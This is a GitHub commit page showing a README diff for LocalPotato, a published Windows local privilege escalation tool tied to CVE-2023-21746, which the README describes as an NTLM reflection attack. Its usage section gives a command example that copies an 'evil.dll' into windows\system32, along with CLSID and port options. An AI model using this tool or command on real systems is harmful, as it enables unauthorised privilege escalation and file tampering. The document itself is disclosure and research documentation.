Skip to content

Commit 72d2635

Browse files
authored
Update README.md
1 parent 149e8c0 commit 72d2635

1 file changed

Lines changed: 30 additions & 3 deletions

File tree

README.md

Lines changed: 30 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,33 @@
11
# LocalPotato
2-
Another local Windows privilege escalation using a new potato technique ;)
2+
Another Local Windows privilege escalation using a new potato technique ;)
33

4-
Details: https://www.localpotato.com
4+
The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.
55

6-
Authors: @decoder_it & @splinter_code
6+
More technical details at --> https://www.localpotato.com
7+
8+
## Usage
9+
10+
```
11+
12+
LocalPotato (aka CVE-2023-21746)
13+
by splinter_code & decoder_it
14+
15+
16+
Mandatory Args:
17+
-i Source file to copy
18+
-o Output file - do not specify the drive letter
19+
Example: localpotato -i c:\hacker\evil.dll -o windows\system32\evil.dll
20+
21+
Optional Args:
22+
-c CLSID (Default {854A20FB-2D44-457D-992F-EF13785D2B51})
23+
-p COM server port (Default 10271)
24+
```
25+
26+
## Demo
27+
28+
![image](https://user-images.githubusercontent.com/19797064/218135881-af046286-c299-4f08-856b-2265adc46e64.png)
29+
30+
31+
## Authors:
32+
- [@decoder_it](https://twitter.com/decoder_it)
33+
- [@splinter_code](https://twitter.com/splinter_code)

0 commit comments

Comments
 (0)